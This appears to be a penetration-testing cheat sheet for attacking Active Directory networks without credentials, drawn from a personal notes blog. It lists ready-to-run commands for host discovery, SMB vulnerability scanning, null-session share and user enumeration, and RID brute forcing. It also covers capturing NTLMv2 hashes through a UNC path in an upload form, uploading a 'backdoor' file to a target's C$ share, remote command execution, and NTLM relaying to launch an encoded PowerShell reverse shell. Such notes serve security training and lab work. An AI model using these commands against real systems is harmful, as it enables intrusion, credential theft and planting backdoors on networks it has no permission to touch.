# Without Credentials ## Without Credentials ### Host Discovery ``` nmap -sn 192.168.2.0/24 ``` ``` fping -a -g 192.168.2.0/24 2>/dev/null ``` ### Scan the network {% hint style="info" %} If we find a vulnerable host we can get easily access to a machine [https://github.com/marcgoam/M4RCG04M-blog/blob/main/notes/active-directory/classic-attacks.md](https://github.com/marcgoam/M4RCG04M-blog/blob/main/notes/active-directory/classic-attacks.md "mention") {% endhint %} ``` # Enumerate smb hosts cme smb IP/CIDR # Search smb vulns nmap -PN --script smb-vuln* -p 139,445 IP ``` ### Zone transfer ``` dig axfr domain@nameserver ``` ### List guest access on smb share {% tabs %} {% tab title="smbmap" %} **Enumerate null session** ``` smbmap -u "" -p "" -H smbmap -u "guest" -p "" -H ``` **To list all drives** ``` smbmap -H -u -p -L ``` **To list contents of C$** ``` smbmap -H -u -p -r 'C$' ``` **To upload files** ``` smbmap -H -u -p --upload '/root/backdoor' 'C$\backdoor' ``` **To download files** ``` smbmap -H -u -p --download 'C$\flag.txt ``` **To execute commands** ``` smbmap -H -u -p -x 'ipconfig',ma ``` {% endtab %} {% tab title="smbclient" %} **Enumerate null session** ``` smbclient -L -N smbclient ///public -N ``` **Enumerate with credentials** ``` smbclient -L -U smbclient ///public -U mbclient //192.168.50.212/secrets -U --pw-nt-hash ``` {% endtab %} {% tab title="enum4linux" %} **Enumerate null session** ``` enum4linux -a -u "" -p "" enum4linux -a -u "guest" -p "" ``` {% endtab %} {% tab title="crackmapexec" %} #### Enumerate null session ``` cme smb -u "" -p "" ``` #### Enumerate anonymous access ``` cme smb -u "a" -p "" ``` {% endtab %} {% endtabs %} ### Enumerate ldap ``` ldapsearch -x -h -s domain ``` ### Find User List {% tabs %} {% tab title="crackmapexec" %} 
cme smb <ip> --users 
cme smb <ip> --users | grep -E '^\s*SMB\s' | awk '{print $5}'
``` crackmapexec smb -u "" -p "" --rid-brute > valid_ad crackmapexec smb -u "guest" -p "" --rid-brute | grep -oP '(?<=: ).*(?= \(SidTypeUser\))' | awk -F'\\\\' '{print $2}' > valid_ad ``` {% endtab %} {% tab title="enum4linux" %} ``` enum4linux -U | grep "user" ``` {% endtab %} {% tab title="net" %} ``` net rpc group members "Domain Users" -W "" -I "" -U "%" ``` {% endtab %} {% tab title="rpcclient" %} {% code overflow="wrap" %} ``` rpcclient -U "" -N IP rpcclient > enumdomusers rpcclient -U "" -N -c "enumdomusers" 10.10.10.172 | grep "^user:" | awk '{print $1}' | cut -d: -f2 | sed 's/\[\|\]//g' ``` {% endcode %} {% endtab %} {% tab title="windapsearch" %} ``` python windapsearch.py -u "" --dc-ip 10.10.10.172 -U --admin-objects python windapsearch.py -u "" --dc-ip 10.10.10.172 -U -m "" ``` {% endtab %} {% endtabs %} ## Grab NTLMv2 hash ### File Upload When we discover a file upload form in a web application on a Windows server, we can try to enter a non-existing file with a UNC path like `\\192.168.119.2\share\nonexistent.txt`. If the web application supports uploads via SMB, the Windows server will authenticate to our SMB server. ![](https://github.com/marcgoam/M4RCG04M-blog/blob/main/notes/active-directory/imgs/Pasted%20image%2020250721124311.png) ## Relaying NTLMv2 ### SMB Relaying Using a powershell one liner encoded should work as reverse shell (Use Encoded powershell payload) ``` impacket-ntlmrelayx --no-http-server -smb2support -t -c ```